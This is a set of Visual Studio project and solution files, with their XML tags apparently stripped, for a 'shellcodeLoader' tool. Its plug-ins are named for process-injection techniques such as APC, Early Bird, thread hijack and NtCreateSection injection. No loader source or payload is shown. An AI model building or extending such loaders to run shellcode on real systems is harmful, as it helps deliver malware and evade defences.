150 |
151 |
152 |
153 |
154 |
155 |
156 |
--------------------------------------------------------------------------------
/plug/Direct Load/Direct Load.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {95367D52-E3A0-46BF-BCAA-AAC13EAF244D}
23 | Win32Proj
24 | DirectLoad
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 | $(SolutionDir)$(Configuration)\DATA\32
81 | .DAT
82 |
83 |
84 | false
85 | $(SolutionDir)\$(Configuration)\DATA\64
86 | .DAT
87 |
88 |
89 |
90 |
91 |
92 | Level3
93 | Disabled
94 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
95 |
96 |
97 | Windows
98 | true
99 |
100 |
101 |
102 |
103 |
104 |
105 | Level3
106 | Disabled
107 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
108 |
109 |
110 | Windows
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 |
118 |
119 | MaxSpeed
120 | true
121 | true
122 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
123 | MultiThreaded
124 |
125 |
126 | Windows
127 | true
128 | true
129 | false
130 |
131 |
132 |
133 |
134 | Level3
135 |
136 |
137 | MaxSpeed
138 | true
139 | true
140 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
141 | MultiThreaded
142 |
143 |
144 | Windows
145 | true
146 | true
147 | false
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
--------------------------------------------------------------------------------
/plug/APC-Ijnect Load/APC-Ijnect Load.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {85B4ED76-7171-4CDF-B909-654E77F54FA4}
23 | Win32Proj
24 | APCIjnectLoad
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 | $(SolutionDir)$(Configuration)\DATA\32
81 | .DAT
82 |
83 |
84 | false
85 | $(SolutionDir)\$(Configuration)\DATA\64
86 | .DAT
87 |
88 |
89 |
90 |
91 |
92 | Level3
93 | Disabled
94 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
95 |
96 |
97 | Windows
98 | true
99 |
100 |
101 |
102 |
103 |
104 |
105 | Level3
106 | Disabled
107 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
108 |
109 |
110 | Windows
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 |
118 |
119 | MaxSpeed
120 | true
121 | true
122 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
123 | MultiThreaded
124 |
125 |
126 | Windows
127 | true
128 | true
129 | false
130 |
131 |
132 |
133 |
134 | Level3
135 |
136 |
137 | MaxSpeed
138 | true
139 | true
140 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
141 | MultiThreaded
142 |
143 |
144 | Windows
145 | true
146 | true
147 | false
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
--------------------------------------------------------------------------------
/plug/SEH Except Load/SEH Except Load.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {8C71DB50-A5B1-4354-A7C7-901E36DDC8AB}
23 | Win32Proj
24 | SEHExceptLoad
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 | $(SolutionDir)$(Configuration)\DATA\32
81 | .DAT
82 |
83 |
84 | false
85 | $(SolutionDir)\$(Configuration)\DATA\64
86 | .DAT
87 |
88 |
89 |
90 |
91 |
92 | Level3
93 | Disabled
94 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
95 |
96 |
97 | Windows
98 | true
99 |
100 |
101 |
102 |
103 |
104 |
105 | Level3
106 | Disabled
107 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
108 |
109 |
110 | Windows
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 |
118 |
119 | MaxSpeed
120 | true
121 | true
122 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
123 | MultiThreaded
124 |
125 |
126 | Windows
127 | true
128 | true
129 | false
130 |
131 |
132 |
133 |
134 | Level3
135 |
136 |
137 | MaxSpeed
138 | true
139 | true
140 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
141 | MultiThreaded
142 |
143 |
144 | Windows
145 | true
146 | true
147 | false
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
--------------------------------------------------------------------------------
/plug/NtTestAlert Load/NtTestAlert Load.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {0E01D108-8DD7-4164-BABD-5257095F0CAF}
23 | Win32Proj
24 | NtTestAlertLoad
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 | $(SolutionDir)$(Configuration)\DATA\32
81 | .DAT
82 |
83 |
84 | false
85 | $(SolutionDir)\$(Configuration)\DATA\64
86 | .DAT
87 |
88 |
89 |
90 |
91 |
92 | Level3
93 | Disabled
94 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
95 |
96 |
97 | Windows
98 | true
99 |
100 |
101 |
102 |
103 |
104 |
105 | Level3
106 | Disabled
107 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
108 |
109 |
110 | Windows
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 |
118 |
119 | MaxSpeed
120 | true
121 | true
122 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
123 | MultiThreaded
124 |
125 |
126 | Windows
127 | true
128 | true
129 | false
130 |
131 |
132 |
133 |
134 | Level3
135 |
136 |
137 | MaxSpeed
138 | true
139 | true
140 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
141 | MultiThreaded
142 |
143 |
144 | Windows
145 | true
146 | true
147 | false
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
--------------------------------------------------------------------------------
/plug/OEP Hiijack-Inject Load/OEP Hiijack-Inject Load.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {7CCFF851-1E2C-4EAD-8415-BB4CBB96FFE0}
23 | Win32Proj
24 | OEPHiijackInjectLoad
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 | $(SolutionDir)$(Configuration)\DATA\32
81 | .DAT
82 |
83 |
84 | false
85 | $(SolutionDir)\$(Configuration)\DATA\64
86 | .DAT
87 |
88 |
89 |
90 |
91 |
92 | Level3
93 | Disabled
94 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
95 |
96 |
97 | Windows
98 | true
99 |
100 |
101 |
102 |
103 |
104 |
105 | Level3
106 | Disabled
107 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
108 |
109 |
110 | Windows
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 |
118 |
119 | MaxSpeed
120 | true
121 | true
122 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
123 | MultiThreaded
124 |
125 |
126 | Windows
127 | true
128 | true
129 | false
130 |
131 |
132 |
133 |
134 | Level3
135 |
136 |
137 | MaxSpeed
138 | true
139 | true
140 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
141 | MultiThreaded
142 |
143 |
144 | Windows
145 | true
146 | true
147 | false
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
--------------------------------------------------------------------------------
/plug/Thread Hiijack-Inject Load/Thread Hiijack-Inject Load.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {9C8E8054-B951-44F4-9B6C-9021BE918EC8}
23 | Win32Proj
24 | ThreadHiijackInjectLoad
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 | $(SolutionDir)$(Configuration)\DATA\32
81 | .DAT
82 |
83 |
84 | false
85 | $(SolutionDir)\$(Configuration)\DATA\64
86 | .DAT
87 |
88 |
89 |
90 |
91 |
92 | Level3
93 | Disabled
94 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
95 |
96 |
97 | Windows
98 | true
99 |
100 |
101 |
102 |
103 |
104 |
105 | Level3
106 | Disabled
107 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
108 |
109 |
110 | Windows
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 |
118 |
119 | MaxSpeed
120 | true
121 | true
122 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
123 | MultiThreaded
124 |
125 |
126 | Windows
127 | true
128 | true
129 | false
130 |
131 |
132 |
133 |
134 | Level3
135 |
136 |
137 | MaxSpeed
138 | true
139 | true
140 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
141 | MultiThreaded
142 |
143 |
144 | Windows
145 | true
146 | true
147 | false
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
--------------------------------------------------------------------------------
/plug/Early Bird APC-Injetc Load/Early Bird APC-Injetc Load.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {F5D3E249-2D2F-4C8F-99D9-4ED661ADBC57}
23 | Win32Proj
24 | EarlyBirdAPCInjetcLoad
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 | $(SolutionDir)$(Configuration)\DATA\32
81 | .DAT
82 |
83 |
84 | false
85 | $(SolutionDir)\$(Configuration)\DATA\64
86 | .DAT
87 |
88 |
89 |
90 |
91 |
92 | Level3
93 | Disabled
94 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
95 |
96 |
97 | Windows
98 | true
99 |
100 |
101 |
102 |
103 |
104 |
105 | Level3
106 | Disabled
107 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
108 |
109 |
110 | Windows
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 |
118 |
119 | MaxSpeed
120 | true
121 | true
122 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
123 | MultiThreaded
124 |
125 |
126 | Windows
127 | true
128 | true
129 | false
130 |
131 |
132 |
133 |
134 | Level3
135 |
136 |
137 | MaxSpeed
138 | true
139 | true
140 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
141 | MultiThreaded
142 |
143 |
144 | Windows
145 | true
146 | true
147 | false
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
--------------------------------------------------------------------------------
/plug/NtCreateSection-Inject Load/NtCreateSection-Inject Load.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {53C190DB-62BA-4D22-BEB9-BAC5F35D8893}
23 | Win32Proj
24 | NtCreateSectionInjectLoad
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 | $(SolutionDir)$(Configuration)\DATA\32
81 | .DAT
82 |
83 |
84 | false
85 | $(SolutionDir)\$(Configuration)\DATA\64
86 | .DAT
87 |
88 |
89 |
90 |
91 |
92 | Level3
93 | Disabled
94 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
95 |
96 |
97 | Windows
98 | true
99 |
100 |
101 |
102 |
103 |
104 |
105 | Level3
106 | Disabled
107 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
108 |
109 |
110 | Windows
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 |
118 |
119 | MaxSpeed
120 | true
121 | true
122 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
123 | MultiThreaded
124 |
125 |
126 | Windows
127 | true
128 | true
129 | false
130 |
131 |
132 |
133 |
134 | Level3
135 |
136 |
137 | MaxSpeed
138 | true
139 | true
140 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
141 | MultiThreaded
142 |
143 |
144 | Windows
145 | true
146 | true
147 | false
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
--------------------------------------------------------------------------------
/plug/Dynamic Load/Dynamic Load.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {E09E4077-06F1-4A26-AFBA-D5FFE8BE10B3}
23 | Win32Proj
24 | DynamicLoad
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 | $(SolutionDir)$(Configuration)\DATA\32
81 | .DAT
82 |
83 |
84 | false
85 | $(SolutionDir)\$(Configuration)\DATA\64
86 | .DAT
87 |
88 |
89 |
90 |
91 |
92 | Level3
93 | Disabled
94 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
95 |
96 |
97 | Windows
98 | true
99 |
100 |
101 |
102 |
103 |
104 |
105 | Level3
106 | Disabled
107 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
108 |
109 |
110 | Windows
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 |
118 |
119 | MaxSpeed
120 | true
121 | true
122 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
123 | MultiThreaded
124 |
125 |
126 | Windows
127 | true
128 | true
129 | false
130 |
131 |
132 |
133 |
134 | Level3
135 |
136 |
137 | MaxSpeed
138 | true
139 | true
140 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
141 | MultiThreaded
142 |
143 |
144 | Windows
145 | true
146 | true
147 | false
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
--------------------------------------------------------------------------------
/plug/TLS Callback Load/TLS Callback Load.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {E804DA50-1B3D-40A8-9FA5-D0A2B427C727}
23 | Win32Proj
24 | TLSCallbackLoad
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 | $(SolutionDir)$(Configuration)\DATA\32
81 | .DAT
82 |
83 |
84 | false
85 | $(SolutionDir)\$(Configuration)\DATA\64
86 | .DAT
87 |
88 |
89 |
90 |
91 |
92 | Level3
93 | Disabled
94 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
95 |
96 |
97 | Windows
98 | true
99 |
100 |
101 |
102 |
103 |
104 |
105 | Level3
106 | Disabled
107 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
108 |
109 |
110 | Windows
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 |
118 |
119 | MaxSpeed
120 | true
121 | true
122 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
123 | MultiThreaded
124 |
125 |
126 | Windows
127 | true
128 | true
129 | false
130 |
131 |
132 |
133 |
134 | Level3
135 |
136 |
137 | MaxSpeed
138 | true
139 | true
140 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
141 | MultiThreaded
142 |
143 |
144 | Windows
145 | true
146 | true
147 | false
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
--------------------------------------------------------------------------------
/plug/Dynamic Load plus/Dynamic Load plus.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {77301751-93B6-4748-87CE-BEABD468F549}
23 | Win32Proj
24 | DynamicLoadplus
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 | $(SolutionDir)$(Configuration)\DATA\32
81 | .DAT
82 |
83 |
84 | false
85 | $(SolutionDir)\$(Configuration)\DATA\64
86 | .DAT
87 |
88 |
89 |
90 |
91 |
92 | Level3
93 | Disabled
94 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
95 |
96 |
97 | Windows
98 | true
99 |
100 |
101 |
102 |
103 |
104 |
105 | Level3
106 | Disabled
107 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
108 |
109 |
110 | Windows
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 |
118 |
119 | MaxSpeed
120 | true
121 | true
122 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
123 | MultiThreaded
124 |
125 |
126 | Windows
127 | true
128 | true
129 | false
130 |
131 |
132 |
133 |
134 | Level3
135 |
136 |
137 | MaxSpeed
138 | true
139 | true
140 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
141 | MultiThreaded
142 |
143 |
144 | Windows
145 | true
146 | true
147 | false
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
--------------------------------------------------------------------------------
/plug/CreateThreatPoolWait Load/CreateThreatPoolWait Load.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {E4458817-99D0-4463-AC97-A91E1F9FB3E1}
23 | Win32Proj
24 | CreateThreatPoolWaitLoad
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 | $(SolutionDir)$(Configuration)\DATA\32
75 | .DAT
76 |
77 |
78 | true
79 |
80 |
81 | false
82 | $(SolutionDir)$(Configuration)\DATA\32
83 | .DAT
84 |
85 |
86 | false
87 | $(SolutionDir)\$(Configuration)\DATA\64
88 | .DAT
89 |
90 |
91 |
92 |
93 |
94 | Level3
95 | Disabled
96 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
97 |
98 |
99 | Windows
100 | true
101 |
102 |
103 |
104 |
105 |
106 |
107 | Level3
108 | Disabled
109 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
110 |
111 |
112 | Windows
113 | true
114 |
115 |
116 |
117 |
118 | Level3
119 |
120 |
121 | MaxSpeed
122 | true
123 | true
124 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
125 | MultiThreaded
126 |
127 |
128 | Windows
129 | true
130 | true
131 | false
132 |
133 |
134 |
135 |
136 | Level3
137 |
138 |
139 | MaxSpeed
140 | true
141 | true
142 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
143 | MultiThreaded
144 |
145 |
146 | Windows
147 | true
148 | true
149 | false
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
--------------------------------------------------------------------------------
/shellcodeLoader/shellcodeLoader.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {44ED408B-59F3-4A73-BEF3-AD7F274AEC54}
23 | shellcodeLoader
24 | 8.1
25 | MFCProj
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 | Static
34 |
35 |
36 | Application
37 | false
38 | v140
39 | true
40 | Unicode
41 | Static
42 |
43 |
44 | Application
45 | true
46 | v140
47 | Unicode
48 | Static
49 |
50 |
51 | Application
52 | false
53 | v140
54 | true
55 | Unicode
56 | Static
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 | true
78 |
79 |
80 | true
81 | $(SolutionDir)$(Platform)\$(Configuration)\
82 |
83 |
84 | false
85 |
86 |
87 | false
88 |
89 |
90 |
91 | Use
92 | Level3
93 | Disabled
94 | WIN32;_WINDOWS;_DEBUG;%(PreprocessorDefinitions)
95 |
96 |
97 | Windows
98 |
99 |
100 | false
101 | true
102 | _DEBUG;%(PreprocessorDefinitions)
103 |
104 |
105 | 0x0804
106 | _DEBUG;%(PreprocessorDefinitions)
107 | $(IntDir);%(AdditionalIncludeDirectories)
108 |
109 |
110 |
111 |
112 | Use
113 | Level3
114 | Disabled
115 | _WINDOWS;_DEBUG;%(PreprocessorDefinitions)
116 |
117 |
118 | Windows
119 |
120 |
121 | false
122 | true
123 | _DEBUG;%(PreprocessorDefinitions)
124 |
125 |
126 | 0x0804
127 | _DEBUG;%(PreprocessorDefinitions)
128 | $(IntDir);%(AdditionalIncludeDirectories)
129 |
130 |
131 |
132 |
133 | Level3
134 | Use
135 | MaxSpeed
136 | true
137 | true
138 | WIN32;_WINDOWS;NDEBUG;%(PreprocessorDefinitions)
139 |
140 |
141 | Windows
142 | true
143 | true
144 | false
145 |
146 |
147 | false
148 | true
149 | NDEBUG;%(PreprocessorDefinitions)
150 |
151 |
152 | 0x0804
153 | NDEBUG;%(PreprocessorDefinitions)
154 | $(IntDir);%(AdditionalIncludeDirectories)
155 |
156 |
157 |
158 |
159 | Level3
160 | Use
161 | MaxSpeed
162 | true
163 | true
164 | _WINDOWS;NDEBUG;%(PreprocessorDefinitions)
165 |
166 |
167 | Windows
168 | true
169 | true
170 |
171 |
172 | false
173 | true
174 | NDEBUG;%(PreprocessorDefinitions)
175 |
176 |
177 | 0x0804
178 | NDEBUG;%(PreprocessorDefinitions)
179 | $(IntDir);%(AdditionalIncludeDirectories)
180 |
181 |
182 |
183 |
184 |
185 |
186 |
187 |
188 |
189 |
190 |
191 |
192 |
193 |
194 |
195 |
196 | Create
197 | Create
198 | Create
199 | Create
200 |
201 |
202 |
203 |
204 |
205 |
206 |
207 |
208 |
209 |
210 |
211 |
212 |
213 |
214 |
215 |
216 |
217 |
218 |
219 |
--------------------------------------------------------------------------------
/shellcodeLoader.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 14
4 | VisualStudioVersion = 14.0.25420.1
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "shellcodeLoader", "shellcodeLoader\shellcodeLoader.vcxproj", "{44ED408B-59F3-4A73-BEF3-AD7F274AEC54}"
7 | EndProject
8 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Generator", "Generator", "{A627454C-01C6-4811-871A-28194598E2C9}"
9 | EndProject
10 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Loader", "Loader", "{714E11DF-8A6C-408B-95BD-D63BA510488E}"
11 | ProjectSection(SolutionItems) = preProject
12 | plug\public.hpp = plug\public.hpp
13 | EndProjectSection
14 | EndProject
15 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Direct", "Direct", "{7F17ED50-B0CD-4BF8-B78F-76F5DBA07F9C}"
16 | EndProject
17 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Inject", "Inject", "{CA099911-8087-4632-96A5-A85511712F38}"
18 | EndProject
